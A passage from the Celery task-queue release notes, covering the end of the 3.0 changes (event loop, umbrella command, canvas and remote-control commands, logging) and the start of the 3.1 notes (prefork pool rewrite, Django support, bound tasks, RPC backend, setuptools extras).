18k additions/8k deletions. .. _`website`: http://celeryproject.org/ .. _`django-celery changelog`: https://github.com/celery/django-celery/tree/master/Changelog .. contents:: :local: :depth: 2 .. _v300-important: Important Notes =============== Broadcast exchanges renamed --------------------------- The workers remote control command exchanges has been renamed (a new :term:`pidbox` name), this is because the ``auto_delete`` flag on the exchanges has been removed, and that makes it incompatible with earlier versions. You can manually delete the old exchanges if you want, using the :program:`celery amqp` command (previously called ``camqadm``): .. code-block:: console $ celery amqp exchange.delete celeryd.pidbox $ celery amqp exchange.delete reply.celeryd.pidbox Event-loop ---------- The worker is now running *without threads* when used with RabbitMQ (AMQP), or Redis as a broker, resulting in: - Much better overall performance. - Fixes several edge case race conditions. - Sub-millisecond timer precision. - Faster shutdown times. The transports supported are: ``py-amqp`` ``librabbitmq``, ``redis``, and ``amqplib``. Hopefully this can be extended to include additional broker transports in the future. For increased reliability the :setting:`CELERY_FORCE_EXECV` setting is enabled by default if the event-loop isn't used. New ``celery`` umbrella command ------------------------------- All Celery's command-line programs are now available from a single :program:`celery` umbrella command. You can see a list of sub-commands and options by running: .. code-block:: console $ celery help Commands include: - ``celery worker`` (previously ``celeryd``). - ``celery beat`` (previously ``celerybeat``). - ``celery amqp`` (previously ``camqadm``). The old programs are still available (``celeryd``, ``celerybeat``, etc), but you're discouraged from using them. Now depends on :pypi:`billiard` ------------------------------- Billiard is a fork of the multiprocessing containing the no-execv patch by ``sbt`` (http://bugs.python.org/issue8713), and also contains the pool improvements previously located in Celery. This fork was necessary as changes to the C extension code was required for the no-execv patch to work. - Issue #625 - Issue #627 - Issue #640 - `django-celery #122 >> from celery import chain # (2 + 2) * 8 / 2 >>> res = chain(add.subtask((2, 2)), mul.subtask((8,)), div.subtask((2,))).apply_async() >>> res.get() == 16 >>> res.parent.get() == 32 >>> res.parent.parent.get() == 4 - Adds :meth:`AsyncResult.get_leaf` Waits and returns the result of the leaf subtask. That's the last node found when traversing the graph, but this means that the graph can be 1-dimensional only (in effect a list). - Adds ``subtask.link(subtask)`` + ``subtask.link_error(subtask)`` Shortcut to ``s.options.setdefault('link', []).append(subtask)`` - Adds ``subtask.flatten_links()`` Returns a flattened list of all dependencies (recursively) Redis: Priority support ----------------------- The message's ``priority`` field is now respected by the Redis transport by having multiple lists for each named queue. The queues are then consumed by in order of priority. The priority field is a number in the range of 0 - 9, where 0 is the default and highest priority. The priority range is collapsed into four steps by default, since it is unlikely that nine steps will yield more benefit than using four steps. The number of steps can be configured by setting the ``priority_steps`` transport option, which must be a list of numbers in **sorted order**: .. code-block:: pycon >>> BROKER_TRANSPORT_OPTIONS = { ... 'priority_steps': [0, 2, 4, 6, 8, 9], ... } Priorities implemented in this way isn't as reliable as priorities on the server side, which is why the feature is nicknamed "quasi-priorities"; **Using routing is still the suggested way of ensuring quality of service**, as client implemented priorities fall short in a number of ways, for example if the worker is busy with long running tasks, has prefetched many messages, or the queues are congested. Still, it is possible that using priorities in combination with routing can be more beneficial than using routing or priorities alone. Experimentation and monitoring should be used to prove this. Contributed by Germán M. Bravo. Redis: Now cycles queues so that consuming is fair -------------------------------------------------- This ensures that a very busy queue won't block messages from other queues, and ensures that all queues have an equal chance of being consumed from. This used to be the case before, but the behavior was accidentally changed while switching to using blocking pop. `group`/`chord`/`chain` are now subtasks ---------------------------------------- - group is no longer an alias to ``TaskSet``, but new all together, since it was very difficult to migrate the ``TaskSet`` class to become a subtask. - A new shortcut has been added to tasks: .. code-block:: pycon >>> task.s(arg1, arg2, kw=1) as a shortcut to: .. code-block:: pycon >>> task.subtask((arg1, arg2), {'kw': 1}) - Tasks can be chained by using the ``|`` operator: .. code-block:: pycon >>> (add.s(2, 2), pow.s(2)).apply_async() - Subtasks can be "evaluated" using the ``~`` operator: .. code-block:: pycon >>> ~add.s(2, 2) 4 >>> ~(add.s(2, 2) | pow.s(2)) is the same as: .. code-block:: pycon >>> chain(add.s(2, 2), pow.s(2)).apply_async().get() - A new subtask_type key has been added to the subtask dictionary. This can be the string ``"chord"``, ``"group"``, ``"chain"``, ``"chunks"``, ``"xmap"``, or ``"xstarmap"``. - maybe_subtask now uses subtask_type to reconstruct the object, to be used when using non-pickle serializers. - The logic for these operations have been moved to dedicated tasks celery.chord, celery.chain and celery.group. - subtask no longer inherits from AttributeDict. It's now a pure dict subclass with properties for attribute access to the relevant keys. - The repr's now outputs how the sequence would like imperatively: .. code-block:: pycon >>> from celery import chord >>> (chord([add.s(i, i) for i in xrange(10)], xsum.s()) | pow.s(2)) tasks.xsum([tasks.add(0, 0), tasks.add(1, 1), tasks.add(2, 2), tasks.add(3, 3), tasks.add(4, 4), tasks.add(5, 5), tasks.add(6, 6), tasks.add(7, 7), tasks.add(8, 8), tasks.add(9, 9)]) | tasks.pow(2) New remote control commands --------------------------- These commands were previously experimental, but they've proven stable and is now documented as part of the official API. - :control:`add_consumer`/:control:`cancel_consumer` Tells workers to consume from a new queue, or cancel consuming from a queue. This command has also been changed so that the worker remembers the queues added, so that the change will persist even if the connection is re-connected. These commands are available programmatically as :meth:`@control.add_consumer` / :meth:`@control.cancel_consumer`: .. code-block:: pycon >>> celery.control.add_consumer(queue_name, ... destination=['w1.example.com']) >>> celery.control.cancel_consumer(queue_name, ... destination=['w1.example.com']) or using the :program:`celery control` command: .. code-block:: console $ celery control -d w1.example.com add_consumer queue $ celery control -d w1.example.com cancel_consumer queue .. note:: Remember that a control command without *destination* will be sent to **all workers**. - :control:`autoscale` Tells workers with ``--autoscale`` enabled to change autoscale max/min concurrency settings. This command is available programmatically as :meth:`@control.autoscale`: .. code-block:: pycon >>> celery.control.autoscale(max=10, min=5, ... destination=['w1.example.com']) or using the :program:`celery control` command: .. code-block:: console $ celery control -d w1.example.com autoscale 10 5 - :control:`pool_grow`/:control:`pool_shrink` Tells workers to add or remove pool processes. These commands are available programmatically as :meth:`@control.pool_grow` / :meth:`@control.pool_shrink`: .. code-block:: pycon >>> celery.control.pool_grow(2, destination=['w1.example.com']) >>> celery.control.pool_shrink(2, destination=['w1.example.com']) or using the :program:`celery control` command: .. code-block:: console $ celery control -d w1.example.com pool_grow 2 $ celery control -d w1.example.com pool_shrink 2 - :program:`celery control` now supports :control:`rate_limit` and :control:`time_limit` commands. See ``celery control --help`` for details. Crontab now supports Day of Month, and Month of Year arguments -------------------------------------------------------------- See the updated list of examples at :ref:`beat-crontab`. Immutable subtasks ------------------ ``subtask``'s can now be immutable, which means that the arguments won't be modified when calling callbacks: .. code-block:: pycon >>> chain(add.s(2, 2), clear_static_electricity.si()) means it'll not receive the argument of the parent task, and ``.si()`` is a shortcut to: .. code-block:: pycon >>> clear_static_electricity.subtask(immutable=True) Logging Improvements -------------------- Logging support now conforms better with best practices. - Classes used by the worker no longer uses app.get_default_logger, but uses `celery.utils.log.get_logger` which simply gets the logger not setting the level, and adds a NullHandler. - Loggers are no longer passed around, instead every module using logging defines a module global logger that's used throughout. - All loggers inherit from a common logger called "celery". - Before ``task.get_logger`` would setup a new logger for every task, and even set the log level. This is no longer the case. - Instead all task loggers now inherit from a common "celery.task" logger that's set up when programs call `setup_logging_subsystem`. - Instead of using LoggerAdapter to augment the formatter with the task_id and task_name field, the task base logger now use a special formatter adding these values at run-time from the currently executing task. - In fact, ``task.get_logger`` is no longer recommended, it is better to add a module-level logger to your tasks module. For example, like this: .. code-block:: python from celery.utils.log import get_task_logger logger = get_task_logger(__name__) @celery.task def add(x, y): logger.debug('Adding %r + %r' % (x, y)) return x + y The resulting logger will then inherit from the ``"celery.task"`` logger so that the current task name and id is included in logging output. - Redirected output from stdout/stderr is now logged to a "celery.redirected" logger. - In addition a few warnings.warn have been replaced with logger.warn. - Now avoids the 'no handlers for logger multiprocessing' warning Task registry no longer global ------------------------------ Every Celery instance now has its own task registry. You can make apps share registries by specifying it: .. code-block:: pycon >>> app1 = Celery() >>> app2 = Celery(tasks=app1.tasks) Note that tasks are shared between registries by default, so that tasks will be added to every subsequently created task registry. As an alternative tasks can be private to specific task registries by setting the ``shared`` argument to the ``@task`` decorator: .. code-block:: python @celery.task(shared=False) def add(x, y): return x + y Abstract tasks are now lazily bound ----------------------------------- The :class:`~celery.task.Task` class is no longer bound to an app by default, it will first be bound (and configured) when a concrete subclass is created. This means that you can safely import and make task base classes, without also initializing the app environment: .. code-block:: python from celery.task import Task class DebugTask(Task): abstract = True def __call__(self, *args, **kwargs): print('CALLING %r' % (self,)) return self.run(*args, **kwargs) .. code-block:: pycon >>> DebugTask >>> @celery1.task(base=DebugTask) ... def add(x, y): ... return x + y >>> add.__class__ > Lazy task decorators -------------------- The ``@task`` decorator is now lazy when used with custom apps. That is, if ``accept_magic_kwargs`` is enabled (her by called "compat mode"), the task decorator executes inline like before, however for custom apps the @task decorator now returns a special PromiseProxy object that's only evaluated on access. All promises will be evaluated when :meth:`@finalize` is called, or implicitly when the task registry is first used. Smart `--app` option -------------------- The :option:`--app ` option now 'auto-detects' - If the provided path is a module it tries to get an attribute named 'celery'. - If the provided path is a package it tries to import a sub module named celery', and get the celery attribute from that module. For example, if you have a project named ``proj`` where the celery app is located in ``from proj.celery import app``, then the following will be equivalent: .. code-block:: console $ celery worker --app=proj $ celery worker --app=proj.celery: $ celery worker --app=proj.celery:app In Other News ------------- - New :setting:`CELERYD_WORKER_LOST_WAIT` to control the timeout in seconds before :exc:`billiard.WorkerLostError` is raised when a worker can't be signaled (Issue #595). Contributed by Brendon Crawford. - Redis event monitor queues are now automatically deleted (Issue #436). - App instance factory methods have been converted to be cached descriptors that creates a new subclass on access. For example, this means that ``app.Worker`` is an actual class and will work as expected when: .. code-block:: python class Worker(app.Worker): ... - New signal: :signal:`task_success`. - Multiprocessing logs are now only emitted if the :envvar:`MP_LOG` environment variable is set. - The Celery instance can now be created with a broker URL .. code-block:: python app = Celery(broker='redis://') - Result backends can now be set using a URL Currently only supported by redis. Example use: .. code-block:: python CELERY_RESULT_BACKEND = 'redis://localhost/1' - Heartbeat frequency now every 5s, and frequency sent with event The heartbeat frequency is now available in the worker event messages, so that clients can decide when to consider workers offline based on this value. - Module celery.actors has been removed, and will be part of cl instead. - Introduces new ``celery`` command, which is an entry-point for all other commands. The main for this command can be run by calling ``celery.start()``. - Annotations now supports decorators if the key starts with '@'. For example: .. code-block:: python def debug_args(fun): @wraps(fun) def _inner(*args, **kwargs): print('ARGS: %r' % (args,)) return _inner CELERY_ANNOTATIONS = { 'tasks.add': {'@__call__': debug_args}, } Also tasks are now always bound by class so that annotated methods end up being bound. - Bug-report now available as a command and broadcast command - Get it from a Python REPL: .. code-block:: pycon >>> import celery >>> print(celery.bugreport()) - Using the ``celery`` command line program: .. code-block:: console $ celery report - Get it from remote workers: .. code-block:: console $ celery inspect report - Module ``celery.log`` moved to :mod:`celery.app.log`. - Module ``celery.task.control`` moved to :mod:`celery.app.control`. - New signal: :signal:`task_revoked` Sent in the main process when the task is revoked or terminated. - ``AsyncResult.task_id`` renamed to ``AsyncResult.id`` - ``TasksetResult.taskset_id`` renamed to ``.id`` - ``xmap(task, sequence)`` and ``xstarmap(task, sequence)`` Returns a list of the results applying the task function to every item in the sequence. Example: .. code-block:: pycon >>> from celery import xstarmap >>> xstarmap(add, zip(range(10), range(10)).apply_async() [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] - ``chunks(task, sequence, chunksize)`` - ``group.skew(start=, stop=, step=)`` Skew will skew the countdown for the individual tasks in a group -- for example with this group: .. code-block:: pycon >>> g = group(add.s(i, i) for i in xrange(10)) Skewing the tasks from 0 seconds to 10 seconds: .. code-block:: pycon >>> g.skew(stop=10) Will have the first task execute in 0 seconds, the second in 1 second, the third in 2 seconds and so on. - 99% test Coverage - :setting:`CELERY_QUEUES` can now be a list/tuple of :class:`~kombu.Queue` instances. Internally :attr:`@amqp.queues` is now a mapping of name/Queue instances, instead of converting on the fly. - Can now specify connection for :class:`@control.inspect`. .. code-block:: python from kombu import Connection i = celery.control.inspect(connection=Connection('redis://')) i.active_queues() - :setting:`CELERY_FORCE_EXECV` is now enabled by default. If the old behavior is wanted the setting can be set to False, or the new `--no-execv` option to :program:`celery worker`. - Deprecated module ``celery.conf`` has been removed. - The :setting:`CELERY_TIMEZONE` now always require the :pypi:`pytz` library to be installed (except if the timezone is set to `UTC`). - The Tokyo Tyrant backend has been removed and is no longer supported. - Now uses :func:`~kombu.common.maybe_declare` to cache queue declarations. - There's no longer a global default for the :setting:`CELERYBEAT_MAX_LOOP_INTERVAL` setting, it is instead set by individual schedulers. - Worker: now truncates very long message bodies in error reports. - No longer deep-copies exceptions when trying to serialize errors. - :envvar:`CELERY_BENCH` environment variable, will now also list memory usage statistics at worker shutdown. - Worker: now only ever use a single timer for all timing needs, and instead set different priorities. - An exceptions arguments are now safely pickled Contributed by Matt Long. - Worker/Beat no longer logs the start-up banner. Previously it would be logged with severity warning, now it's only written to stdout. - The ``contrib/`` directory in the distribution has been renamed to ``extra/``. - New signal: :signal:`task_revoked` - :mod:`celery.contrib.migrate`: Many improvements, including; filtering, queue migration, and support for acking messages on the broker migrating from. Contributed by John Watson. - Worker: Prefetch count increments are now optimized and grouped together. - Worker: No longer calls ``consume`` on the remote control command queue twice. Probably didn't cause any problems, but was unnecessary. Internals --------- - ``app.broker_connection`` is now ``app.connection`` Both names still work. - Compatibility modules are now generated dynamically upon use. These modules are ``celery.messaging``, ``celery.log``, ``celery.decorators`` and ``celery.registry``. - :mod:`celery.utils` refactored into multiple modules: :mod:`celery.utils.text` :mod:`celery.utils.imports` :mod:`celery.utils.functional` - Now using :mod:`kombu.utils.encoding` instead of :mod:`celery.utils.encoding`. - Renamed module ``celery.routes`` -> :mod:`celery.app.routes`. - Renamed package ``celery.db`` -> :mod:`celery.backends.database`. - Renamed module ``celery.abstract`` -> :mod:`celery.worker.bootsteps`. - Command line docs are now parsed from the module docstrings. - Test suite directory has been reorganized. - :program:`setup.py` now reads docs from the :file:`requirements/` directory. - Celery commands no longer wraps output (Issue #700). Contributed by Thomas Johansson. .. _v300-experimental: Experimental ============ :mod:`celery.contrib.methods`: Task decorator for methods ---------------------------------------------------------- This is an experimental module containing a task decorator, and a task decorator filter, that can be used to create tasks out of methods:: from celery.contrib.methods import task_method class Counter(object): def __init__(self): self.value = 1 @celery.task(name='Counter.increment', filter=task_method) def increment(self, n=1): self.value += 1 return self.value See :mod:`celery.contrib.methods` for more information. .. _v300-unscheduled-removals: Unscheduled Removals ==================== Usually we don't make backward incompatible removals, but these removals should have no major effect. - The following settings have been renamed: - ``CELERYD_ETA_SCHEDULER`` -> ``CELERYD_TIMER`` - ``CELERYD_ETA_SCHEDULER_PRECISION`` -> ``CELERYD_TIMER_PRECISION`` .. _v300-deprecations: Deprecation Time-line Changes ============================= See the :ref:`deprecation-timeline`. - The ``celery.backends.pyredis`` compat module has been removed. Use :mod:`celery.backends.redis` instead! - The following undocumented API's has been moved: - ``control.inspect.add_consumer`` -> :meth:`@control.add_consumer`. - ``control.inspect.cancel_consumer`` -> :meth:`@control.cancel_consumer`. - ``control.inspect.enable_events`` -> :meth:`@control.enable_events`. - ``control.inspect.disable_events`` -> :meth:`@control.disable_events`. This way ``inspect()`` is only used for commands that don't modify anything, while idempotent control commands that make changes are on the control objects. Fixes ===== - Retry SQLAlchemy backend operations on DatabaseError/OperationalError (Issue #634) - Tasks that called ``retry`` wasn't acknowledged if acks late was enabled Fix contributed by David Markey. - The message priority argument wasn't properly propagated to Kombu (Issue #708). Fix contributed by Eran Rundstein ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-3.1.rst0000664000175000017500000012614100000000000020224 0ustar00asifasif00000000000000.. _whatsnew-3.1: =========================================== What's new in Celery 3.1 (Cipater) =========================================== :Author: Ask Solem (``ask at celeryproject.org``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.6, 2.7, and 3.3, and also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= Deadlocks have long plagued our workers, and while uncommon they're not acceptable. They're also infamous for being extremely hard to diagnose and reproduce, so to make this job easier I wrote a stress test suite that bombards the worker with different tasks in an attempt to break it. What happens if thousands of worker child processes are killed every second? what if we also kill the broker connection every 10 seconds? These are examples of what the stress test suite will do to the worker, and it reruns these tests using different configuration combinations to find edge case bugs. The end result was that I had to rewrite the prefork pool to avoid the use of the POSIX semaphore. This was extremely challenging, but after months of hard work the worker now finally passes the stress test suite. There's probably more bugs to find, but the good news is that we now have a tool to reproduce them, so should you be so unlucky to experience a bug then we'll write a test for it and squash it! Note that I've also moved many broker transports into experimental status: the only transports recommended for production use today is RabbitMQ and Redis. I don't have the resources to maintain all of them, so bugs are left unresolved. I wish that someone will step up and take responsibility for these transports or donate resources to improve them, but as the situation is now I don't think the quality is up to date with the rest of the code-base so I cannot recommend them for production use. The next version of Celery 4.0 will focus on performance and removing rarely used parts of the library. Work has also started on a new message protocol, supporting multiple languages and more. The initial draft can be found :ref:`here `. This has probably been the hardest release I've worked on, so no introduction to this changelog would be complete without a massive thank you to everyone who contributed and helped me test it! Thank you for your support! *— Ask Solem* .. _v310-important: Important Notes =============== Dropped support for Python 2.5 ------------------------------ Celery now requires Python 2.6 or later. The new dual code base runs on both Python 2 and 3, without requiring the ``2to3`` porting tool. .. note:: This is also the last version to support Python 2.6! From Celery 4.0 and on-wards Python 2.7 or later will be required. .. _last-version-to-enable-pickle: Last version to enable Pickle by default ---------------------------------------- Starting from Celery 4.0 the default serializer will be json. If you depend on pickle being accepted you should be prepared for this change by explicitly allowing your worker to consume pickled messages using the :setting:`CELERY_ACCEPT_CONTENT` setting: .. code-block:: python CELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml'] Make sure you only select the serialization formats you'll actually be using, and make sure you've properly secured your broker from unwanted access (see the :ref:`Security Guide `). The worker will emit a deprecation warning if you don't define this setting. .. topic:: for Kombu users Kombu 3.0 no longer accepts pickled messages by default, so if you use Kombu directly then you have to configure your consumers: see the :ref:`Kombu 3.0 Changelog ` for more information. Old command-line programs removed and deprecated ------------------------------------------------ Everyone should move to the new :program:`celery` umbrella command, so we're incrementally deprecating the old command names. In this version we've removed all commands that aren't used in init-scripts. The rest will be removed in 4.0. +-------------------+--------------+-------------------------------------+ | Program | New Status | Replacement | +===================+==============+=====================================+ | ``celeryd`` | *DEPRECATED* | :program:`celery worker` | +-------------------+--------------+-------------------------------------+ | ``celerybeat`` | *DEPRECATED* | :program:`celery beat` | +-------------------+--------------+-------------------------------------+ | ``celeryd-multi`` | *DEPRECATED* | :program:`celery multi` | +-------------------+--------------+-------------------------------------+ | ``celeryctl`` | **REMOVED** | :program:`celery inspect|control` | +-------------------+--------------+-------------------------------------+ | ``celeryev`` | **REMOVED** | :program:`celery events` | +-------------------+--------------+-------------------------------------+ | ``camqadm`` | **REMOVED** | :program:`celery amqp` | +-------------------+--------------+-------------------------------------+ If this isn't a new installation then you may want to remove the old commands: .. code-block:: console $ pip uninstall celery $ # repeat until it fails # ... $ pip uninstall celery $ pip install celery Please run :program:`celery --help` for help using the umbrella command. .. _v310-news: News ==== Prefork Pool Improvements ------------------------- These improvements are only active if you use an async capable transport. This means only RabbitMQ (AMQP) and Redis are supported at this point and other transports will still use the thread-based fallback implementation. - Pool is now using one IPC queue per child process. Previously the pool shared one queue between all child processes, using a POSIX semaphore as a mutex to achieve exclusive read and write access. The POSIX semaphore has now been removed and each child process gets a dedicated queue. This means that the worker will require more file descriptors (two descriptors per process), but it also means that performance is improved and we can send work to individual child processes. POSIX semaphores aren't released when a process is killed, so killing processes could lead to a deadlock if it happened while the semaphore was acquired. There's no good solution to fix this, so the best option was to remove the semaphore. - Asynchronous write operations The pool now uses async I/O to send work to the child processes. - Lost process detection is now immediate. If a child process is killed or exits mysteriously the pool previously had to wait for 30 seconds before marking the task with a :exc:`~celery.exceptions.WorkerLostError`. It had to do this because the out-queue was shared between all processes, and the pool couldn't be certain whether the process completed the task or not. So an arbitrary timeout of 30 seconds was chosen, as it was believed that the out-queue would've been drained by this point. This timeout is no longer necessary, and so the task can be marked as failed as soon as the pool gets the notification that the process exited. - Rare race conditions fixed Most of these bugs were never reported to us, but were discovered while running the new stress test suite. Caveats ~~~~~~~ .. topic:: Long running tasks The new pool will send tasks to a child process as long as the process in-queue is writable, and since the socket is buffered this means that the processes are, in effect, prefetching tasks. This benefits performance but it also means that other tasks may be stuck waiting for a long running task to complete:: -> send T1 to Process A # A executes T1 -> send T2 to Process B # B executes T2 <- T2 complete -> send T3 to Process A # A still executing T1, T3 stuck in local buffer and # won't start until T1 returns The buffer size varies based on the operating system: some may have a buffer as small as 64KB but on recent Linux versions the buffer size is 1MB (can only be changed system wide). You can disable this prefetching behavior by enabling the :option:`-Ofair ` worker option: .. code-block:: console $ celery -A proj worker -l info -Ofair With this option enabled the worker will only write to workers that are available for work, disabling the prefetch behavior. .. topic:: Max tasks per child If a process exits and pool prefetch is enabled the worker may have already written many tasks to the process in-queue, and these tasks must then be moved back and rewritten to a new process. This is very expensive if you have the :option:`--max-tasks-per-child ` option set to a low value (e.g., less than 10), you should not be using the :option:`-Ofast ` scheduler option. Django supported out of the box ------------------------------- Celery 3.0 introduced a shiny new API, but unfortunately didn't have a solution for Django users. The situation changes with this version as Django is now supported in core and new Django users coming to Celery are now expected to use the new API directly. The Django community has a convention where there's a separate ``django-x`` package for every library, acting like a bridge between Django and the library. Having a separate project for Django users has been a pain for Celery, with multiple issue trackers and multiple documentation sources, and then lastly since 3.0 we even had different APIs. With this version we challenge that convention and Django users will use the same library, the same API and the same documentation as everyone else. There's no rush to port your existing code to use the new API, but if you'd like to experiment with it you should know that: - You need to use a Celery application instance. The new Celery API introduced in 3.0 requires users to instantiate the library by creating an application: .. code-block:: python from celery import Celery app = Celery() - You need to explicitly integrate Celery with Django Celery won't automatically use the Django settings, so you can either configure Celery separately or you can tell it to use the Django settings with: .. code-block:: python app.config_from_object('django.conf:settings') Neither will it automatically traverse your installed apps to find task modules. If you want this behavior, you must explicitly pass a list of Django instances to the Celery app: .. code-block:: python from django.conf import settings app.autodiscover_tasks(lambda: settings.INSTALLED_APPS) - You no longer use ``manage.py`` Instead you use the :program:`celery` command directly: .. code-block:: console $ celery -A proj worker -l info For this to work your app module must store the :envvar:`DJANGO_SETTINGS_MODULE` environment variable, see the example in the :ref:`Django guide `. To get started with the new API you should first read the :ref:`first-steps` tutorial, and then you should read the Django-specific instructions in :ref:`django-first-steps`. The fixes and improvements applied by the :pypi:`django-celery` library are now automatically applied by core Celery when it detects that the :envvar:`DJANGO_SETTINGS_MODULE` environment variable is set. The distribution ships with a new example project using Django in :file:`examples/django`: https://github.com/celery/celery/tree/3.1/examples/django Some features still require the :pypi:`django-celery` library: - Celery doesn't implement the Django database or cache result backends. - Celery doesn't ship with the database-based periodic task scheduler. .. note:: If you're still using the old API when you upgrade to Celery 3.1 then you must make sure that your settings module contains the ``djcelery.setup_loader()`` line, since this will no longer happen as a side-effect of importing the :pypi:`django-celery` module. New users (or if you've ported to the new API) don't need the ``setup_loader`` line anymore, and must make sure to remove it. Events are now ordered using logical time ----------------------------------------- Keeping physical clocks in perfect sync is impossible, so using time-stamps to order events in a distributed system isn't reliable. Celery event messages have included a logical clock value for some time, but starting with this version that field is also used to order them. Also, events now record timezone information by including a new ``utcoffset`` field in the event message. This is a signed integer telling the difference from UTC time in hours, so for example, an event sent from the Europe/London timezone in daylight savings time will have an offset of 1. :class:`@events.Receiver` will automatically convert the time-stamps to the local timezone. .. note:: The logical clock is synchronized with other nodes in the same cluster (neighbors), so this means that the logical epoch will start at the point when the first worker in the cluster starts. If all of the workers are shutdown the clock value will be lost and reset to 0. To protect against this, you should specify the :option:`celery worker --statedb` option such that the worker can persist the clock value at shutdown. You may notice that the logical clock is an integer value and increases very rapidly. Don't worry about the value overflowing though, as even in the most busy clusters it may take several millennium before the clock exceeds a 64 bits value. New worker node name format (``name@host``) ------------------------------------------- Node names are now constructed by two elements: name and host-name separated by '@'. This change was made to more easily identify multiple instances running on the same machine. If a custom name isn't specified then the worker will use the name 'celery' by default, resulting in a fully qualified node name of 'celery@hostname': .. code-block:: console $ celery worker -n example.com celery@example.com To also set the name you must include the @: .. code-block:: console $ celery worker -n worker1@example.com worker1@example.com The worker will identify itself using the fully qualified node name in events and broadcast messages, so where before a worker would identify itself as 'worker1.example.com', it'll now use 'celery@worker1.example.com'. Remember that the :option:`-n ` argument also supports simple variable substitutions, so if the current host-name is *george.example.com* then the ``%h`` macro will expand into that: .. code-block:: console $ celery worker -n worker1@%h worker1@george.example.com The available substitutions are as follows: +---------------+----------------------------------------+ | Variable | Substitution | +===============+========================================+ | ``%h`` | Full host-name (including domain name) | +---------------+----------------------------------------+ | ``%d`` | Domain name only | +---------------+----------------------------------------+ | ``%n`` | Host-name only (without domain name) | +---------------+----------------------------------------+ | ``%%`` | The character ``%`` | +---------------+----------------------------------------+ Bound tasks ----------- The task decorator can now create "bound tasks", which means that the task will receive the ``self`` argument. .. code-block:: python @app.task(bind=True) def send_twitter_status(self, oauth, tweet): try: twitter = Twitter(oauth) twitter.update_status(tweet) except (Twitter.FailWhaleError, Twitter.LoginError) as exc: raise self.retry(exc=exc) Using *bound tasks* is now the recommended approach whenever you need access to the task instance or request context. Previously one would've to refer to the name of the task instead (``send_twitter_status.retry``), but this could lead to problems in some configurations. Mingle: Worker synchronization ------------------------------ The worker will now attempt to synchronize with other workers in the same cluster. Synchronized data currently includes revoked tasks and logical clock. This only happens at start-up and causes a one second start-up delay to collect broadcast responses from other workers. You can disable this bootstep using the :option:`celery worker --without-mingle` option. Gossip: Worker <-> Worker communication --------------------------------------- Workers are now passively subscribing to worker related events like heartbeats. This means that a worker knows what other workers are doing and can detect if they go offline. Currently this is only used for clock synchronization, but there are many possibilities for future additions and you can write extensions that take advantage of this already. Some ideas include consensus protocols, reroute task to best worker (based on resource usage or data locality) or restarting workers when they crash. We believe that although this is a small addition, it opens amazing possibilities. You can disable this bootstep using the :option:`celery worker --without-gossip` option. Bootsteps: Extending the worker ------------------------------- By writing bootsteps you can now easily extend the consumer part of the worker to add additional features, like custom message consumers. The worker has been using bootsteps for some time, but these were never documented. In this version the consumer part of the worker has also been rewritten to use bootsteps and the new :ref:`guide-extending` guide documents examples extending the worker, including adding custom message consumers. See the :ref:`guide-extending` guide for more information. .. note:: Bootsteps written for older versions won't be compatible with this version, as the API has changed significantly. The old API was experimental and internal but should you be so unlucky to use it then please contact the mailing-list and we'll help you port the bootstep to the new API. New RPC result backend ---------------------- This new experimental version of the ``amqp`` result backend is a good alternative to use in classical RPC scenarios, where the process that initiates the task is always the process to retrieve the result. It uses Kombu to send and retrieve results, and each client uses a unique queue for replies to be sent to. This avoids the significant overhead of the original amqp result backend which creates one queue per task. By default results sent using this backend won't persist, so they won't survive a broker restart. You can enable the :setting:`CELERY_RESULT_PERSISTENT` setting to change that. .. code-block:: python CELERY_RESULT_BACKEND = 'rpc' CELERY_RESULT_PERSISTENT = True Note that chords are currently not supported by the RPC backend. Time limits can now be set by the client ---------------------------------------- Two new options have been added to the Calling API: ``time_limit`` and ``soft_time_limit``: .. code-block:: pycon >>> res = add.apply_async((2, 2), time_limit=10, soft_time_limit=8) >>> res = add.subtask((2, 2), time_limit=10, soft_time_limit=8).delay() >>> res = add.s(2, 2).set(time_limit=10, soft_time_limit=8).delay() Contributed by Mher Movsisyan. Redis: Broadcast messages and virtual hosts ------------------------------------------- Broadcast messages are currently seen by all virtual hosts when using the Redis transport. You can now fix this by enabling a prefix to all channels so that the messages are separated: .. code-block:: python BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True} Note that you'll not be able to communicate with workers running older versions or workers that doesn't have this setting enabled. This setting will be the default in a future version. Related to Issue #1490. :pypi:`pytz` replaces :pypi:`python-dateutil` dependency -------------------------------------------------------- Celery no longer depends on the :pypi:`python-dateutil` library, but instead a new dependency on the :pypi:`pytz` library was added. The :pypi:`pytz` library was already recommended for accurate timezone support. This also means that dependencies are the same for both Python 2 and Python 3, and that the :file:`requirements/default-py3k.txt` file has been removed. Support for :pypi:`setuptools` extra requirements ------------------------------------------------- Pip now supports the :pypi:`setuptools` extra requirements format, so we've removed the old bundles concept, and instead specify setuptools extras. You install extras by specifying them inside brackets: .. code-block:: console $ pip install celery[redis,mongodb] The above will install the dependencies for Redis and MongoDB. You can list as many extras as you want. .. warning:: You can't use the ``celery-with-*`` packages anymore, as these won't be updated to use Celery 3.1. +-------------+-------------------------+---------------------------+ | Extension | Requirement entry | Type | +=============+=========================+===========================+ | Redis | ``celery[redis]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | MongoDB | ``celery[mongodb]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | CouchDB | ``celery[couchdb]`` | transport | +-------------+-------------------------+---------------------------+ | Beanstalk | ``celery[beanstalk]`` | transport | +-------------+-------------------------+---------------------------+ | ZeroMQ | ``celery[zeromq]`` | transport | +-------------+-------------------------+---------------------------+ | Zookeeper | ``celery[zookeeper]`` | transport | +-------------+-------------------------+---------------------------+ | SQLAlchemy | ``celery[sqlalchemy]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | librabbitmq | 